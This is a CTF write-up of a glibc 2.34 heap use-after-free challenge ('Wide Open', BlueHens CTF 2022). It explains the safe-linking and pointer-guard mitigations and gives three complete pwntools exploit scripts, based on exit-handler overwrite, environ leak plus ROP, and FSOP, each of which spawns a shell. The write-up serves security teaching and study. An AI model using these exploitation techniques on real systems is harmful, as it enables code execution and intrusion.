Skip to content

Wide Open

In BlueHens CTF 2022, 497 points

Full Green Heap 2.34, how many ways can you find?

nc 0.cloud.chals.io 10605

Challenge files: pwnme (1) ld-linux-x86-64.so.2

This challenge is a fairly standard heap challenge. The binary provides the standard four functions:

  • Allocate an arbitrary sized chunk (it seems to state that up to 100 chunks can be allocated, but this isn't checked anywhere)
  • Free a previously allocated chunk. The pointer to the chunk is not zeroed, so we have UAF/double free here.
  • Edit a previously allocated chunk. We can edit the metadata of a freed chunk to achieve arbitrary read/write.
  • View the contents of a previously allocated chunk. We can use this to leak libc (via unsorted bin pointers) and heap (via tcache pointers)

Seems fairly standard, right? I've written writeups about these kinds of heap challenges here. The twist here is the challenge runs glibc 2.34, which includes several mitigations that make the techniques detailed in the previous writeup impossible.

Thus, this writeup will explore the mitigations introduced after glibc 2.31 and several methods to bypass them.

Safe linking

In regular tcache poisoning, we can freely overwrite tcache pointers to achieve arbitrary read/write. In glibc 2.32, safe linking was introduced to "encrypt" the pointers in the tcache and fastbins to make it more difficult to manipulate these pointers. The code for encrypting the pointer can be found here:

c
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

pos is the address where the pointer will be stored, and ptr is the pointer. Essentially the pointer is XORed with the page number of the page it is stored in. Since most of the pointers we are concerned about will be stored in the heap, we just need to leak the page number of one of the chunks in the heap. This is easy as we can just leak the (encrypted) tcache pointers and do some math to recover the original pointer:

py
def deobfuscate(val):
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= (v >> 12)
        mask >>= 12
    return val

(Code from here)

Once we have obtained the original pointer, we can just XOR it with the encrypted value to recover the key.

Removal of hooks

Glibc 2.34 removed __malloc_hook and __free_hook, two important hooks that allowed us to obtain $rip control with a single arbitrary write.

There are actually multiple approaches to bypass this protection. I will discuss the method I used, as well as two other methods I have seen in other's solve scripts:

  • The method I used: writing to exit_function_list (based on here with tweaks)
  • The method used by Triacontakai of ViewSource: leak stack + ROP
  • The method used by the challenge author: File stream oriented programming

Exit function list

Note: this technique is heavily based on this writeup

Similarly to __malloc_hook, the __exit_funcs variable in glibc contains information about what functions to call when a certain operation occurs, in this case on program exit.

The __exit_funcs variable points to a exit_function_list struct, which in turn contains exit_functions.

c
struct exit_function
  {
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
      {
    void (*at) (void);
    struct
      {
        void (*fn) (int status, void *arg);
        void *arg;
      } on;
    struct
      {
        void (*fn) (void *arg, int status);
        void *arg;
        void *dso_handle;
      } cxa;
      } func;
  };

There are three different types of exit_function (at, on and cxa). Since our goal is to call system("/bin/sh"), the cxa variant seems most applicable as the first argument is a pointer. The 'flavor' is represented by the number 4.

Fortunately, the default exit_function_list is at a constant offset in libc, so we can simply allocate a chunk there and overwrite the fn pointer right

(Un)fortunately, glibc has implemented an additional protection: pointer guard. This sounds similar to the safe linking mechanism but relies on a secret key instead of the memory location of the pointer to be encrypted.

This is implemented here and implemented in the linked writeup in python as:

py
# The shifts are copied from the above blogpost
# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

# encrypt a function pointer
def encrypt(v, key):
    return p64(rol(v ^ key, 0x11, 64))

The key is actually stored in memory in the thread control block (TCB), the same place that stack canaries are stored:

c
typedef struct
{
  void *tcb;		/* Pointer to the TCB.  Not necessarily the
			   thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;		/* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;   // <------ this is the field we are interested in
  unsigned long int unused_vgetcpu_cache[2];
  /* Bit 0: X86_FEATURE_1_IBT.
     Bit 1: X86_FEATURE_1_SHSTK.
   */
  unsigned int feature_1;
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI.  */
  void *__private_tm[4];
  /* GCC split stack support.  */
  void *__private_ss;
  /* The lowest address of shadow stack,  */
  unsigned long long int ssp_base;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t.  */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

  void *__padding[8];
} tcbhead_t;

After some searching with GDB, I found the offset of the TCB from the libc address.

From here, I used the previously established arbitrary write primitive to zero out the pointer_guard. Fortunately, the address was 16 byte aligned so there was no problem allocating a chunk there.

With the pointer guard key zeroed out, we just need to rotate the address of system left by 0x11 bits to pass the pointer mangling. Now, we can just write this 'mangled' address to the fn of exit_function struct set the arg to a pointer to /bin/sh (a chunk I allocated on the heap). Thus, system("/bin/sh") is called when the program exits.

Unfortunately, this requires two writes, which is somewhat more complicated than traditional heap UAF pwn. The original writeup actually recovers the key by leaking the obfuscated fn value, which is known to correspond to _dl_fini. Unfortunately, the address of fn was not 16 byte aligned in this case, so we cannot allocate a chunk on that address. Unfortunately, allocating a chunk 8 bytes before the desired address and filling the 8 bytes with padding will not work as fgets adds a null terminator to the end of the written string. However, if read was used instead, this technique would be feasible, only requiring one fake chunk.

py
from pwn import *

e = ELF("./chal")
libc = ELF("libc.so.6", checksec=False)
ld = ELF("ld-linux-x86-64.so.2", checksec=False)
context.binary = e

def setup():
    p = e.process()
    return p

def alloc(p, i, size, s):
    p.recvuntil(">")
    p.sendline("1")
    p.recvuntil("index")
    p.sendline(str(i))
    p.recvuntil("big")
    p.sendline(str(size))
    p.recvuntil("payload")
    p.sendline(s)
def edit(p, i, s):
    p.recvuntil(">")
    p.sendline("3")
    p.recvuntil("index")
    p.sendline(str(i))
    p.recvuntil("contents")
    p.sendline(s)
def free(p,i):
    p.recvuntil(">")
    p.sendline("2")
    p.recvuntil("index")
    p.sendline(str(i))
def view(p,i):
    p.recvuntil(">")
    p.sendline("4")
    p.recvuntil("index")
    p.sendline(str(i))
    (p.recvline())
    return p.recvline(keepends=False)[2:]


def defu(p):
    d = 0
    for i in range(0x100,0,-4):
      pa = (p & (0xf << i )) >> i
      pb = (d & (0xf << i+12 )) >> i+12
      d |= (pa ^ pb) << i
    return d

def obfuscate(p, adr):
    return p^(adr>>12)

rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

if __name__ == '__main__':
    p = setup()


    for i in range(2):
        alloc(p, i, 30, str(i))

    for i in range(2,4):
        alloc(p, i, 100, str(i))
    alloc(p, 5, 0x1000, b"unsort")
    alloc(p, 6, 100, b"buffer")
    alloc(p, 7, 100, b"/bin/sh")
    for i in range(6):
       free(p, i)
    l = view(p,1)
    l = defu(u64(l+b"\0\0"))

    libc_leak = u64(view(p, 5)+b"\0\0")
    libc.address = libc_leak - 0x1f2cc0
    print(hex(libc.address))


    # First write fs:30 to zero out encryption key
    target_heap_addr = l + 30
    # Location where fs:30 is stored
    target_addr = libc.address - 0x2890
    edit(p, 1, p64(obfuscate(target_addr, target_heap_addr)))

    alloc(p, 0, 30, b"aa")
    # Write fs:30
    alloc(p, 0, 30, b"\0"*20)

    # Second write
    target_heap_addr2 = l + 0xd0
    target_addr2 = libc.address + 0x1f4bc0
    edit(p, 3, p64(obfuscate(target_addr2, target_heap_addr2)))
    alloc(p, 0, 100, b"aa")
    bin_sh = l + 0x11c0
    onexit_fun = p64(0) + p64(1) + p64(4) +p64(rol(libc.sym.system, 0x11, 64)) + p64(bin_sh) + p64(0)
    alloc(p, 0, 100, onexit_fun)

    # exit
    p.sendline("5")
    p.sendline("id")

    p.interactive()

Stack leak + ROP

This technique was used by Triacontakai in https://discord.com/channels/820012263845920768/823257424088924201/1036404972130152478.

This is perhaps the simplest of the methods detailed here, but also requires two fake chunks.

First, the glibc environ symbol is leaked. This symbol contains a stack address (the address of the third argument of main, char **envp).

This is actually nontrivial. The author allocates chunks of data size 24 bytes, which produces chunks of size 0x20. This is the smallest possible glibc heap chunk size.

Next, the author performs the typical tcache poisoning attack. However, instead of allocating chunks of size 24, the author allocates chunks of data size 0. As 0x20 is the smallest chunk size, malloc(0) returns chunks from the 0x20 size tcache. However, 0 is also the size passed to fgets, so no data is written to the target environ chunk, not even the null byte, allowing its value to be read subsequently.

Once the environ is leaked, the author calculates a target chunk so that when malloc is called in menu_malloc, it returns a pointer to the saved rip of the function. This allows the author to write their ROP 'ret2libc' payload, while bypassing the stack guard completely.

Their solve script is reproduced below:

py
import re
import sys
from pwn import *

path = './pwnme'
host = '0.cloud.chals.io'
port = 10605

libc = ELF('./libc.so.6')

if len(sys.argv) > 1:
    p = gdb.debug(path, '''
        c
    ''', api=True, aslr=True)
else:
    p = remote(host, port)

def b():
    p.gdb.interrupt_and_wait()
    input("press any key to resume")
def numb(num):
    return str(num).encode('ascii')

def alloc(idx, size, data):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'> ', numb(idx))
    p.sendlineafter(b'> ', numb(size))
    p.sendlineafter(b'> ', data)

def delete(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'> ', numb(idx))

def edit(idx, data):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'> ', numb(idx))
    p.sendlineafter(b'> ', data)

def view(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'> ', numb(idx))
    return p.recvuntil(b'You are', drop=True)

# allocate unsorted bin chunk for libc leak
alloc(0, 0x420, b'AAAAAAAA')

# allocate tcache size chunk for heap leak
# this also prevents unsorted bin chunk from coalescing on free
alloc(1, 24, b'BBBBBBBB')

# allocate another 0x20 size chunk for poisoning later
alloc(2, 24, b'CCCCCCCC')

# free 0x20 size chunks into tcache
# looks like this:
# [2] -> [1]
delete(1)
delete(2)

# free unsorted bin size chunk to put libc address
delete(0)

# get heap leak
leak = u64(view(1)[:-1].ljust(8, b'\x00'))
heap = leak << 12
log.info(f"heap base: 0x{heap:x}")

# get libc leak
leak = u64(view(0)[:-1].ljust(8, b'\x00'))
libc.address = leak - (0x7f1d52750cc0 - 0x7f1d5255e000)
log.info(f"libc base: 0x{libc.address:x}")

# do tcache poisoning
mask = heap >> 12
edit(2, p64(mask ^ libc.symbols['environ']))

# allocate two chunks
# second chunk will be environ chunk
alloc(2, 0, b'')
alloc(2, 0, b'')

# get stack leak
stack = u64(view(2)[:-1].ljust(8, b'\x00'))
log.info(f"stack leak: 0x{stack:x}")

# offset stack leak to return address location
stack -= 336 + 8

# do poisoning again to get write on stack woohoo im having so much fun
alloc(1, 0x40-8, b'')
alloc(2, 0x40-8, b'')
delete(1)
delete(2)
edit(2, p64(mask ^ stack))

pop_rdi = libc.address + 0x000000000002daa2
binsh = next(libc.search(b'/bin/sh\x00'))

payload = b'A' * 8
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(libc.symbols['system'])

alloc(2, 0x40-8, b'')
alloc(2, 0x40-8, payload)

p.interactive()

File stream oriented programming

This is the technique used by the challenge author. In my opinion, it is far more complicated than the other two techniques.

It still requires two fake chunks, and requires editing one of the chunks twice. The chunks sizes allocated are also quite large. After so much trouble, I'm not sure what the advantages of this method are over the others.

Anyway, I've done some FSOP here, but this is significantly more complex.

To summarize, each file stream (like stdout) has an _IO_FILE_plus struct which contains a _IO_FILE and a pointer to a vtable. By manipulating the function pointers in the vtable, we can control RIP. The attack then pops a shell via a one gadget.

This method is similar to that, except the one gadgets we have in this libc have fairly strict conditions, and I couldn't find a function pointer that I could overwrite with a one gadget that would work.

The challenge author uses _IO_OVERFLOW, which is called by _IO_flush_all_lockp on process exit as part of the cleanup process.

Unfortunately, _IO_flush_all_lockp will be called whenever file streams are flushed, which as it turns out is quite a lot.

However, _IO_OVERFLOW is only called if specific conditions are met:

c
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
     || (_IO_vtable_offset (fp) == 0
         && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                              > fp->_wide_data->_IO_write_base))
    )
    && _IO_OVERFLOW (fp, EOF) == EOF)

_IO_OVERFLOW will only be called if either of the first two conditions in the if statement return true.

To start, the author allocates a large fake chunk over _IO_2_1_stdout_. Using this fake chunk, they modify fp->mode to be greater than 0, and fp->_IO_write_ptr to be greater than fp->_IO_write_base.

The second condition of the if statement (fp->_mode > 0) will not be called as fp->_wide_data->_IO_write_ptr == fp->_wide_data->_IO_write_base == 0 .

Thus, by setting fp->_mode > 0, premature execution of _IO_OVERFLOW is prevented. Unfortunately, this also causes output to be disabled.

Next, the author allocates another large chunk on __GI__IO_file_jumps, the file vtable. The author modifies the __overflow field to the one gadget address. However, since the first argument of _IO_OVERFLOW is the file pointer, which we have write access to, I decided to use system, instead of a one gadget.

Once the vtable is manipulated, I modified the _IO_2_1_stdout_ object again to set the _flags field to /bin/sh. Since _flags is at the start of the file object, when _IO_OVERFLOW is called, _flags will be the string that is passed to system. We could not do this beforehand as messing up the file flags would cause a crash. The fp->_mode field is set to -1 so that the checks can pass and allow _IO_OVERFLOW to be called.

Now, all that's left is to command the process to exit and system(_IO_2_1_stdout_) will be called, which is equivalent to system("/bin/sh").

Modified solve script:

py
from pwn import *
from time import sleep
import re


p=process("./chal")
libc = ELF("./libc.so.6")
elf=ELF("./chal")

def malloc(ind, size, payload):
    global p
    r1 = p.sendlineafter(b">", "1")
    r2 = p.sendlineafter(b">", str(ind))
    r3 = p.sendlineafter(b">", str(size))
    r4 = p.sendlineafter(b">",payload)
    return r1+r2+r3+r4

def malloc_no_out(ind, size, payload):
    global p
    sleep(1)
    p.sendline("1")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)
    p.sendline(str(size))
    sleep(1)
    p.sendline(payload)

def free(ind):
    global p
    r1 = p.sendlineafter(b">", "2")
    r2 = p.sendlineafter(b">", str(ind))
    return r1 + r2

def free_no_out(ind):
    global p
    sleep(1)
    p.sendline("2")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)

def edit(ind, payload):
    global p
    r1 = p.sendlineafter(b">","3")
    r2 = p.sendlineafter(b">",str(ind))
    r3 = p.sendlineafter(b">",payload)
    return r1+r2+r3

def edit_no_out(ind, payload):
    global p
    sleep(1)
    p.sendline("3")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)
    p.sendline(payload)

def view(ind):
    global p
    r1 = p.sendlineafter(b">", "4")
    r2 = p.sendlineafter(b">", str(ind))
    leak = p.recvuntil(b"addresses.");
    return leak

def raw2leak(resp):
    leakr=resp[1:].split(b"\n")[0]
    return u64(leakr.ljust(8, b'\x00'))

def decrypt(leak):
    key=0
    res=0
    for i in range(1,6):
        bits=64-12*i
        if bits < 0:
            bits = 0
        res = ((leak ^ key) >> bits) << bits
        key = res >> 12
    return res

#GOAL 0: make a glibc leak by creating an unsorted size then a buffer chunk and freeing the big one:
print(malloc(50, 0x420, "hi there"))
print(malloc(51, 24, "smol"))
print(free(50))
raw = view(50)
leakr=raw[1:].split(b"\n")[0]
glibcleak = u64(leakr.ljust(8, b'\x00'))
libc.address = glibcleak - (libc.sym.main_arena+96)
one_gadget = 0xda811 + libc.address
filler = libc.sym._IO_2_1_stdout_ - 131
stdout_FILE = (p64(filler)*4
        + p64(filler + 1)*2
        + p64(filler)
        + p64(filler + 1)
        + p64(0)*4
        + p64(libc.sym._IO_2_1_stdin_)
        + p64(1)
        + p64(0xffffffffffffffff)
        + p64(0x0)
        + p64(libc.sym._IO_stdfile_1_lock)
        + p64(0xffffffffffffffff)
        + p64(0)
        + p64(libc.sym._IO_wide_data_1)
        + p64(0x0)*3 )



#OK targeting _IO_2_1_stdout_ -16 or -32

malloc(0, 0x368, "chunk0")
malloc(1, 0x368, "chunk1")
malloc(2, 0x378, "chunk2")
malloc(3, 0x378, "chunk3")
malloc(4, 24, "smol2")
free(0)
free(1)
free(2)
free(3)
print("commencing heap leak")
heapleap = decrypt(raw2leak(view(1)))
heapleap = (heapleap >> 12) << 12
print(hex(heapleap))
print("target stdout", hex(libc.sym._IO_2_1_stdout_))
print("target file jumps", hex(libc.sym.__GI__IO_file_jumps))
edit(1, p64( (libc.sym._IO_2_1_stdout_) ^ (heapleap >> 12)) + p64(heapleap) )
edit_no_out(3, p64( (libc.sym.__GI__IO_file_jumps) ^ (heapleap >> 12)) + p64(heapleap) )

malloc(5, 0x368, "junk")
malloc(6, 0x378, "junk2")
print("wait for it...")

malloc(7, 0x368, p64(0xfbad2887) + stdout_FILE + p32(2) + p32(0) )

gi_jump = (p64(0)*2 +
        p64(libc.sym._IO_new_file_finish)+
        p64(libc.sym.system)+#p64(libc.sym._IO_new_file_overflow)+
        p64(libc.sym._IO_new_file_underflow)+
        p64(libc.sym.__GI__IO_default_uflow)+
        p64(libc.sym.__GI__IO_default_pbackfail)+
        p64(libc.sym._IO_new_file_xsputn)+
        p64(libc.sym.__GI__IO_file_xsgetn)+
        p64(libc.sym._IO_new_file_seekoff)+
        p64(libc.sym._IO_default_seekpos)+
        p64(libc.sym._IO_new_file_setbuf)+
        p64(libc.sym._IO_new_file_sync)+
        p64(libc.sym.__GI__IO_file_doallocate)+
        p64(libc.sym.__GI__IO_file_read)+
        p64(libc.sym._IO_new_file_write)+
        p64(libc.sym.__GI__IO_file_seek)+

        p64(libc.sym.__GI__IO_file_close)+
        p64(libc.sym.__GI__IO_file_stat)+
        p64(libc.sym._IO_default_showmanyc)+
        p64(libc.sym._IO_default_imbue))
malloc_no_out(8, 0x378, gi_jump)

edit_no_out(7, b"/bin/sh\0" + stdout_FILE+p32(0xffffffff))
print("ready")
p.sendline("5")
p.interactive()